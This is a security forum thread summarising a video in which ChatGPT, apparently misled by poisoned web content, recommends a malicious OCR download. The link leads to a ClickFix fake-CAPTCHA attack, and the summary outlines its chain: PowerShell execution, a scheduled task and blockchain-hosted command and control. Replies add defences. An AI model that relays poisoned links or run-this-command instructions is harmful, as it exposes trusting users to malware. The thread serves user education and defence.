App Review ChatGPT now recommends Malware?

It is advised to take all reviews with a grain of salt. In extreme cases some reviews use dramatization for entertainment purposes.
Content created by
Eric Parker

Khushal

Level 14
Thread author
Verified
Top Poster
Well-known
Apr 4, 2024
697
4,116
1,269


### Summary

In this video, Eric explores a recent and concerning example of how AI-generated content, specifically from ChatGPT’s free model, can inadvertently facilitate malware distribution. The core incident involves a user querying ChatGPT for a good OCR (Optical Character Recognition) tool for Windows. Instead of providing legitimate software recommendations, ChatGPT, influenced by biased or manipulated online content, returned a malicious link that led to a **click-fraud and malware attack known as "ClickFix."**

Eric demonstrates how this malware operates, including its infection vector and payload delivery, and discusses the broader implications of AI’s role in cybersecurity vulnerabilities.

---

### Key Insights and Findings

- **ChatGPT Free Model’s Limitations:**
The free version of ChatGPT (auto free) is constrained to a specific language model that may provide less accurate or even dangerous advice, unlike paid versions that allow switching between models for better results.

- **Malware Distribution via AI Responses:**
The user’s query about OCR tools was met with a malicious reply directing them to a **fraudulent GitHub repository**, which actually hosted malware disguised behind a fake CAPTCHA ("ClickFix attack").

- **ClickFix Attack Characteristics:**
- Uses Windows shortcut keys to initiate PowerShell commands.
- Deploys obfuscated PowerShell scripts involving task schedulers and anti-evasion techniques such as sleeps and hiding payloads.
- Connects to **blockchain-based hosting (Binance Smart Chain)** as a bulletproof command and control (C2) infrastructure, leveraging its low fees and decentralized nature.
- Supports multiple platforms (Windows primarily, with some Linux and Mac targeting), though payloads differ by platform and attacker configuration.

- **Malware-as-a-Service (MaaS):**
The ClickFix system is sold as a service, allowing cybercriminals to customize payloads including fake blue screens, fake browser updates, or fake Cloudflare blocks, depending on the victim's OS and browser.

- **Sandbox Testing Results:**
Testing on various virtual machines (Windows, Linux, Mac) showed different behaviors, such as payload delivery or glitching of browser windows, depending on the OS and sandbox environment.

- **AI and Malware Intersection:**
This represents the **first observed case of a modern large language model (LLM) providing malware installation instructions organically** (not through poisoned ads but via its knowledge base/context). This highlights AI’s lack of cybersecurity common sense.

- **Search Engines vs. AI Responses:**
In comparison, Google and Bing gave mixed results:
- Google performed better in identifying the official site.
- Bing ranked the malicious site as legitimate, possibly due to Microsoft’s relationship with OpenAI.
- AI Overview recognized the scam correctly.

- **Recommendations and Warnings:**
- Do not trust AI or search engines blindly for software recommendations, especially security-related tools.
- Any prompt to download code, execute scripts, or install browser extensions as part of a CAPTCHA or update should be treated as a **red flag for scams or malware**.
- Endpoint protection tools like **Threat Locker** can mitigate such attacks by restricting unauthorized application behaviors, such as PowerShell misuse.

---

### Timeline of Key Events

| Timecode | Event Description |
|----------------|------------------------------------------------------------------------------------------------------------|
| 00:00:00-00:00:55 | Introduction: Eric receives an intriguing malware-related query from a user involving ChatGPT. |
| 00:00:56-00:02:01 | User requests OCR tool recommendation from ChatGPT (free model); receives suspicious/malicious advice. |
| 00:02:01-00:03:21 | Overview of ClickFix malware infection sequence and introduction of Threat Locker sponsor message. |
| 00:03:22-00:05:27 | Testing malware in sandbox environments (Windows VM, Linux); observing payload behaviors and infection. |
| 00:05:28-00:08:22 | Further sandbox tests on Mac, Linux; discussion of malware-as-a-service and multi-OS payload capabilities. |
| 00:08:23-00:10:06 | Exploration of blockchain use (Binance Smart Chain) for hosting malware payloads; AI’s inconsistent advice. |
| 00:10:07-00:12:04 | Comparison of search engines’ site legitimacy detection; Bing’s poor ranking of malicious site noted. |
| 00:12:05-00:15:59 | Technical malware analysis: PowerShell script, task scheduler, reverse C2 shell, and blockchain-based C2. |
| 00:16:00-00:17:57 | Summary of malware distribution methods including Google ads, SEO, and AI-generated content manipulation. |
| 00:17:58-00:18:50 | Final warnings regarding AI and search engine trustworthiness; advice to avoid executing suspicious code. |

---

### Technical Concepts and Definitions

| Term | Definition |
|--------------------------|----------------------------------------------------------------------------------------------------|
| ClickFix | Malware attack using fake CAPTCHA to trick users into running malicious PowerShell scripts. |
| OCR (Optical Character Recognition) | Software that converts images of text into machine-encoded text. |
| Malware-as-a-Service (MaaS) | A business model where malware tools and infrastructure are sold or rented to cybercriminals. |
| Reverse C2 Shell | A type of command and control communication where the infected machine connects back to the attacker.|
| Binance Smart Chain | A blockchain platform used here as decentralized, bulletproof hosting for malware payloads. |
| Endpoint Detection and Response (EDR) | Security tools designed to detect, analyze, and block cyber threats on endpoints like PCs and servers.|

---

### Core Conclusions

- **AI tools, especially free LLM versions, can inadvertently recommend malicious sites due to their reliance on biased or manipulated data, lacking cybersecurity judgment.**
- **ClickFix malware uses sophisticated evasion and multi-platform payload delivery, leveraging blockchain for C2 resilience.**
- **AI and search engine results must be critically evaluated, particularly for cybersecurity-related queries.**
- **Defensive measures like Threat Locker’s endpoint protection are essential to block malicious payload execution and contain such AI-driven attack vectors.**
- **Users should never trust or execute code that comes disguised as legitimate CAPTCHA or update prompts.**

---

### Recommendations for Users and Security Professionals

- Always verify software sources through trusted official channels, not AI-generated answers alone.
- Use robust endpoint protection with application control and ring-fencing capabilities.
- Educate users to recognize social engineering tactics such as fake CAPTCHAs or update prompts requiring code execution.
- Monitor AI tools for potential security risks and apply caution when incorporating AI recommendations into operational decisions.

---

### Keywords

- ChatGPT, AI, malware distribution, ClickFix, PowerShell, OCR tools, malware-as-a-service, blockchain C2, endpoint protection, Threat Locker, cybersecurity, phishing, sandbox analysis, Binance Smart Chain, reverse C2 shell, AI misinformation.
 
This is a good write-up of a broader problem: “AI as a software recommender” can become an amplification layer for SEO poisoning and social-engineering, even when the original user intent is harmless (e.g., “recommend an OCR tool”).

What’s important (and generally accurate) about the ClickFix angle
ClickFix-style campaigns are primarily about getting the user to execute something “by themselves,” typically via a fake CAPTCHA / fake block page that instructs copy/paste + Run, which then launches PowerShell and pulls the next stage. That technique is effective because it bypasses a lot of “drive-by download” expectations and leans on user trust and muscle memory.

Where I’d be careful with claims in the summary
  • “Free model vs paid model = safe vs unsafe”: model tier doesn’t reliably map to “security correctness.” Any LLM can surface bad advice if it’s pulling from poisoned narratives or if it hallucinates. Treat all AI output as untrusted, especially links and “download this” instructions.
  • “First observed case of an LLM providing malware instructions organically”: I can’t verify “first” without sources, and historically there have been many examples of chatbots producing harmful instructions/code. This incident is still notable because it shows how a normal “what OCR tool should I use?” query can be steered into a malware path.
  • Attributing Bing results to vendor relationships: that’s speculation. Search ranking failures happen for lots of reasons (SEO abuse, compromised sites, weak reputation signals, etc.). It’s better to frame it as “search results can be poisoned” rather than “because of X relationship.”

Practical takeaway for MalwareTips readers: treat “link recommendations” as untrusted input
A safe workflow when AI/search suggests software (OCR tools, drivers, cleaners, etc.):

  • Do not click AI-provided links blindly. Instead, search the vendor name yourself and confirm the official domain.
  • Prefer built-in / reputable sources: Microsoft Store, vendor’s official site, or well-known vendors. (For OCR on Windows, examples many people use include Microsoft OneNote OCR, PowerToys “Text Extractor,” Adobe Acrobat OCR, ABBYY FineReader, and Tesseract from its official project—still verify the publisher/source before installing.)
  • Red flags = “CAPTCHA/update requires running commands”. Any page telling you to press Win+R, paste from clipboard, run PowerShell/Terminal, install an extension, or “fix verification” is a stop sign.
  • Verify before running: check digital signature (where applicable), scan with your AV, and if you must, submit the file/URL to VirusTotal and wait for community/vendor analysis (keeping in mind false positives can happen).

Defender/EDR-side mitigations that help against ClickFix-style chains
  • Application control / allowlisting (WDAC, AppLocker, or third-party such as ThreatLocker) to limit script interpreters and unknown binaries.
  • PowerShell hardening: disable PowerShell v2, enable script block logging, and restrict who can run PowerShell where feasible.
  • Microsoft Defender Attack Surface Reduction (ASR) rules (where available) to reduce common script-and-living-off-the-land abuse paths.
  • Browser protections: SmartScreen, reputation-based blocking, and (in orgs) DNS/web filtering.

Bottom line
The “AI recommended a malicious path” part is credible as a risk pattern: AI and search can be manipulated, and ClickFix succeeds by pushing users to execute commands themselves. The safest stance is to treat AI-generated links and “run this command” guidance as hostile until independently verified via official sources and standard security checks.
 
Recognize that AI is just processing the web on steroids and shouldn't be implicitly trusted for cybersecurity. But for the average user who assumes AI acts as a filtered, safe intermediary, the article's core advice is a necessary reality check, always verify the output and run good endpoint protection.
 
An AI recommending malware is proof that “digital common sense” cannot be outsourced. If an assistant invites us to install shady stuff or run commands, the right answer is to shut the door. Security remains a fortress we must guard ourselves, not an automatic scout. 🔒🧭🚪